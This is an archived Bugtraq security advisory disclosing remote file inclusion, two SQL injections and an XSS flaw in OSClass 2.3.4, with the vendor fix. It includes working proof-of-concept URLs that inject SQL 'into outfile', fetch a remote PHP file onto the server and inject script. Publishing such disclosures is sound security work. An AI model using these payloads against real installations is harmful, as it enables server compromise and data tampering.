[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple vulnerabilities in OSClass
From: Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date: 2012-01-30 12:31:58
Message-ID: 9FD841D6-CBAF-4238-9030-603BBF29384F () codseq ! it
[Download RAW message or body]
Advisory ID: CSA-12003
Title: Multiple vulnerabilities in OSClass
Product: OSClass
Version: 2.3.4 and probably prior
Vendor: osclass.org
Vulnerability type: SQL injection, XSS, Remote file inclusion
Vendor notification: 2012-01-12
Public disclosure: 2012-01-27
OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:
1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put \
an arbitrary file (ie a melicious php script) on the server under the www root so \
it's possible to execute shell commands with the previleges of the webserver An \
attacker must be logged as admin to exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php
http://127.0.0.1/osclass/oc-content/downloads/tmp.php
2) SQL injection in admin's ajax interface when performing the "edit_category_post" \
action. The GET parameted id is not sanitized. An attacker must be logged as admin to \
exploit this vulnerability; gpc_magic_quotes must be off
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US% \
23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201
3) SQL injection in admin's ajax interface when performing the "enable_category" \
action. The GET parameted id is not sanitized. An attacker must be logged as admin to \
exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201
(id must be a valid subcategory id - in this case gpc_magic_quotes can be on)
4) XSS in admin's' ajax interface. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.
http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E
(id must be a valid category id)
Solution
upgrade to OSClass 2.3.5
http://osclass.org/2012/01/16/osclass-2-3-5/
Filippo Cavallarin
C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic